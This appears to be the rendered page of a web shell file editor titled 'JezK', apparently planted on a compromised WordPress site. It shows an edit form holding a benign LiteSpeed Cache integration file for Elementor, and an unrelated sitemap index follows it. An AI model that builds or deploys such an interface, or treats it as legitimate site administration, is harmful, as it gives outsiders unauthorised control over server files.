
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: elementor.cls.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
// phpcs:ignoreFile
/**
 * The Third Party integration with the bbPress plugin.
 *
 * @since       2.9.8.8
 */
namespace LiteSpeed\Thirdparty;

defined(&#039;WPINC&#039;) || exit();

use LiteSpeed\Debug2;

class Elementor {

	public static function preload() {
		if (!defined(&#039;ELEMENTOR_VERSION&#039;)) {
			return;
		}

		if (!is_admin()) {
			// add_action( &#039;init&#039;, __CLASS__ . &#039;::disable_litespeed_esi&#039;, 4 ); // temporarily comment out this line for backward compatibility
		}

		if (isset($_GET[&#039;action&#039;]) &amp;&amp; $_GET[&#039;action&#039;] === &#039;elementor&#039;) {
			do_action(&#039;litespeed_disable_all&#039;, &#039;elementor edit mode&#039;);
		}

		if (!empty($_SERVER[&#039;HTTP_REFERER&#039;]) &amp;&amp; strpos($_SERVER[&#039;HTTP_REFERER&#039;], &#039;action=elementor&#039;)) {
			if (!empty($_REQUEST[&#039;actions&#039;])) {
				$json = json_decode(stripslashes($_REQUEST[&#039;actions&#039;]), true);
				// Debug2::debug( &#039;3rd Elementor&#039;, $json );
				if (
					!empty($json[&#039;save_builder&#039;][&#039;action&#039;]) &amp;&amp;
					$json[&#039;save_builder&#039;][&#039;action&#039;] == &#039;save_builder&#039; &amp;&amp;
					!empty($json[&#039;save_builder&#039;][&#039;data&#039;][&#039;status&#039;]) &amp;&amp;
					$json[&#039;save_builder&#039;][&#039;data&#039;][&#039;status&#039;] == &#039;publish&#039;
				) {
					return; // Save post, don&#039;t disable all in case we will allow fire crawler right away after purged
				}
			}
			do_action(&#039;litespeed_disable_all&#039;, &#039;elementor edit mode in HTTP_REFERER&#039;);
		}

		// Clear LSC cache on Elementor Regenerate CSS &amp; Data
		add_action(&#039;elementor/core/files/clear_cache&#039;, __CLASS__ . &#039;::regenerate_litespeed_cache&#039;);
	}

	public static function disable_litespeed_esi() {
		define(&#039;LITESPEED_ESI_OFF&#039;, true);
	}

	public static function regenerate_litespeed_cache() {
		do_action(&#039;litespeed_purge_all&#039;, &#039;Elementor - Regenerate CSS &amp; Data&#039;);
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
